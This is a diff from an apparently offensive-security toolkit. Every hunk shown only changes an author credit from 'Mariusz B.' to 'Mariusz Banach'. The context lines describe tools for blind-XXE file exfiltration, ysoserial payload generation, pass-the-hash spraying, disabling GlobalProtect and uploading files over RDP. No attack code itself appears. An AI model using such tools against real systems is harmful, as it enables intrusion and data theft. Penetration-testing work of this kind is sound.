Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''')
if len(argv) < 2:


@ -31,7 +31,7 @@
# mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false
#
#
# Mariusz B., 2016
# Mariusz Banach, 2016
#
@ -132,7 +132,7 @@ def parseOptions(argv):
print('''
:: Blind-XXE attacker's helper backend component
Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities.
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')


@ -1,7 +1,7 @@
#!/usr/bin/python
#
# Padding Oracle test-cases generator.
# Mariusz B. / mgeeky, 2016
# Mariusz Banach / mgeeky, 2016
# v0.2
#
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
@ -277,7 +277,7 @@ def hex_dump(data):
def main():
info('\n\tPadding Oracle test-cases generator')
info('\tMariusz B. / mgeeky, 2016\n')
info('\tMariusz Banach / mgeeky, 2016\n')
if len(sys.argv) < 2:
warning('usage: padding-oracle-tests.py <data> [blocksize]')


@ -14,7 +14,7 @@
* to add forced redirection to the target site.
*
* Authors:
* Mariusz B. / mgeeky
* Mariusz Banach / mgeeky
* Jakub M. / unkn0w
*
* Version:


@ -80,7 +80,7 @@ hostname|23:55|~/dev/py-collaborator # python3.7 py-collaborator-server.py -d
:: Cracking the Lens pingback responding server
Responds to every Out-of-band request correlating them along the way
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
[-] You shall specify all needed MySQL connection data either via program options or config file.
[+] Database initialized.


@ -211,7 +211,7 @@ def parseOptions(argv):
print('''
:: Cracking the Lens pingback responding server
Responds to every Out-of-band request correlating them along the way
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')


@ -18,7 +18,7 @@
# - jwt
# - anytree
#
# Mariusz B., 2018
# Mariusz Banach, 2018
#
import os


@ -26,7 +26,7 @@
# $ ./ysoserial-generator.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000
# :: ysoserial payloads generation helper
# Helps generate many variations of payloads to try against vulnerable application.
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
# v0.1
#
# [+] Command within payload:
@ -55,7 +55,7 @@
#
#
# Author:
# Mariusz B., '18-19 / <mb@binary-offensive.com>
# Mariusz Banach, '18-19 / <mb@binary-offensive.com>
#
import os
@ -379,7 +379,7 @@ def parseOptions(argv):
print('''
:: ysoserial payloads generation helper
Helps generate many variations of payloads to try against vulnerable application.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{}
'''.format(VERSION))


@ -12,7 +12,7 @@
* Compilation:
* C:> g++ GlobalProtectDisable.cpp -o GlobalProtectDisable.exe -static -static-libgcc -static-libstdc++
*
* Mariusz B. / mgeeky, '18-'20
* Mariusz Banach / mgeeky, '18-'20
**/
#include "windows.h"


@ -13,7 +13,7 @@
```
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
Mariusz B. / mgeeky, '21
Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com>
usage: .\findSymbols.py [options] <path>
@ -117,7 +117,7 @@ PS> python3 rdpFileUpload.py -v -f certutil README.md
Takes an input file/folder and retypes it into focused RDP session window.
That effectively uploads the file into remote host over a RDP channel.
Mariusz B. / mgeeky '20, (@mariuszbit)
Mariusz Banach / mgeeky '20, (@mariuszbit)
<mb@binary-offensive.com>
[+] Will upload file's contents: "README.md"


@ -9,7 +9,7 @@
# - module matching name
# - module NOT matching name
#
# Mariusz B. / mgeeky, '21
# Mariusz Banach / mgeeky, '21
# <mb [at] binary-offensive.com>
#
@ -436,7 +436,7 @@ def main():
out('''
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
Mariusz B. / mgeeky, '21
Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com>
''')


@ -23,7 +23,7 @@
# $ ./pth-carpet.py machines.txt pwdump
#
# coded by:
# Mariusz B., 2016 / mgeeky
# Mariusz Banach, 2016 / mgeeky
# version 0.2
#
# Should be working on Windows boxes as well as on Linux ones.
@ -172,7 +172,7 @@ def worker(stopevent, pwdump, machine):
def main():
global OPTIONS
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz B., 2016\n', 'white', attrs=['bold']))
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz Banach, 2016\n', 'white', attrs=['bold']))
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')


@ -21,7 +21,7 @@
# - tqdm
#
# Author:
# Mariusz B. / mgeeky (@mariuszbit), '20
# Mariusz Banach / mgeeky (@mariuszbit), '20
# <mb [at] binary-offensive.com>
#
@ -313,7 +313,7 @@ def parseOptions(argv):
Takes an input file/folder and retypes it into focused RDP session window.
That effectively uploads the file into remote host over a RDP channel.
Mariusz B. / mgeeky '20, (@mariuszbit)
Mariusz Banach / mgeeky '20, (@mariuszbit)
<mb@binary-offensive.com>
''')